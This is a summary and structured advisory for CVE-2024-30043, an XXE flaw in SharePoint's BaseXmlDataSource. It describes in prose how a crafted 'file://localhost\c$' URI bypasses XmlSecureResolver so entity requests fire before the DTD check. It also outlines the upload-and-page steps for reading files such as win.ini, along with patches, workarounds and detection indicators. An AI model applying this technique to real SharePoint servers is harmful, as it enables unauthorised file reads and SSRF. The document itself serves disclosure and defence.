Full Report
XML eXternal Entity (XXE) injection is a vulnerability in XML parsing that allows for the adding of entities for file reads, SSRF and other issues. Most of the time, XXE bugs are fairly simple but this one was a weird URL parsing issue. Microsoft.SharePoint.WebControls.BaseXmlDataSource is a class in Microsoft Sharepoint for loading data source objects on a Sharepoint page. The DataSource URL can be controlled as an arbitrary URL. While reading the code with claimed XXE protections, they tried to include a DTD and it surprisingly worked! According to the author, code that properly blocks DTD inclusion in .NET is pretty rare. So, what was going on? The resolver will try to handle the entities THEN will perform a prohibit check. So, an exception ends up being thrown but NOT before the request is actually made. When doing the check for DTD inclusion within XmlSecureResolver, it does a check to URL check to prevent arbitrary domains from being used. In particular, the domain being pulled from MUST be the same as the data being requested. The end goal was to get a XmlSecureResolver policy that allows for the reading of local files and allows for HTTP requests. The goal is to trick the policy writer to give us an unrestricted policy yet still be able to request data. This is a classic situation where URL parsing differences really matter. After tinkering around for a few hours, they came to file://localhost\c$/sites/mysite/test.xml. Since this is a file URI, it gets ignored. Next, it looks for the ending of the file path, which is a local file system path, which we can freely write to anyway. With this, the XXE bug becomes exploitable. Here are the steps: Upload the malicious XML file to sharepoint as part of a website. This requires a low privileged user to do. Next, create a page with the datasource being the malformed URL above. Step 2 will retrieve the malicious XML. The XmlSecureResolver creates a policy based upon the URL without any restrictions. The malicious XML trigger the XXE bug. Even though an error is triggered on the XXE bug with a DTD exception, it is too late in the processing. The requests to retrieve arbitrary files, such as win.ini, are already done. I found the error being triggered after the processing so fun. It's a good reminder to always look for side effects on a request that are not directly returned in the response. Overall, a really good write up! I enjoyed the images throughout, as it was a difficult bug to think about.
Analysis Summary
# Vulnerability: URL Parsing Confusion Leading to XXE in SharePoint
## CVE Details
- **CVE ID**: CVE-2024-30043
- **CVSS Score**: 7.1 (High)
- **CWE**: CWE-611 (Improper Restriction of XML External Entity Reference)
## Affected Systems
- **Products**: Microsoft SharePoint Server, SharePoint Cloud (Microsoft 365)
- **Versions**: Supported versions of SharePoint Server 2016, 2019, and Subscription Edition (prior to May 2024 patches).
- **Configurations**: Any SharePoint site where a user has permissions to add or modify web parts (specifically `BaseXmlDataSource` controls).
## Vulnerability Description
The vulnerability exists in the `Microsoft.SharePoint.WebControls.BaseXmlDataSource` class. While the code attempts to block DTD processing using `XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit`, a logic flaw in .NET's `XmlReader` implementation causes it to handle parameter entities via the assigned `XmlResolver` *before* conducting the prohibition check.
Furthermore, an attacker can bypass `XmlSecureResolver` restrictions by exploiting URL parsing confusion. By using a malformed URI (e.g., `file://localhost\c$/path/to/malicious.xml`), the resolver perceives the path as local/internal and grants an unrestricted policy. This allows an attacker to trigger an Out-of-Band (OOB) XXE attack that executes before the application throws a DTD exception.
## Exploitation
- **Status**: PoC available/detailed in research; patched by vendor.
- **Complexity**: Medium (Requires understanding of .NET XML resolver behavior and URL path manipulation).
- **Attack Vector**: Network (Authenticated). Requires low-privileged user access to upload a file and modify a page.
## Impact
- **Confidentiality**: High (Arbitrary file read with SharePoint Farm Service account permissions; SSRF to internal resources).
- **Integrity**: None.
- **Availability**: Low (Possible NTLM relaying or resource exhaustion).
## Remediation
### Patches
- Microsoft released security updates addressing this vulnerability in the **May 2024 Patch Tuesday** cycle. Administrators should update SharePoint Server to the latest build.
### Workarounds
- Restrict permissions for low-privileged users to prevent them from adding or modifying Data Source controls on SharePoint pages.
- Monitor for unusual outbound HTTP/SMB traffic from SharePoint servers to untrusted internal or external IP addresses.
## Detection
- **Indicators of Compromise**:
- Presence of `file://localhost\c$...` or similar malformed URIs in SharePoint WebPart configurations.
- Unexpected outbound requests from the SharePoint Service Account.
- **Detection methods**: Review SharePoint ULS (Unified Logging Service) logs for `DtdProcessingException` errors occurring immediately after successful outbound requests to unknown XML sources.
## References
- **Vendor Advisory**: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30043](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30043)
- **ZDI Analysis**: [https://www.zerodayinitiative.com/blog/2024/5/30/cve-2024-30043-abusing-url-parsing-confusion-to-exploit-xxe-on-sharepoint-server-and-cloud](https://www.zerodayinitiative.com/blog/2024/5/30/cve-2024-30043-abusing-url-parsing-confusion-to-exploit-xxe-on-sharepoint-server-and-cloud)